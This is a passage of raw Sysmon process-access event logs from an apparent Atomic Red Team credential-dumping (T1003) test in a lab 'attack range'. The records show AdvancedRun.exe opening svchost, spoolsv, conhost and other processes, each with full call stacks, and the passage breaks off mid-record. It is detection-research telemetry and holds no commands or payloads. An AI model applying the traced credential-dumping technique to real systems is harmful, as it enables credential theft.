17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\Atom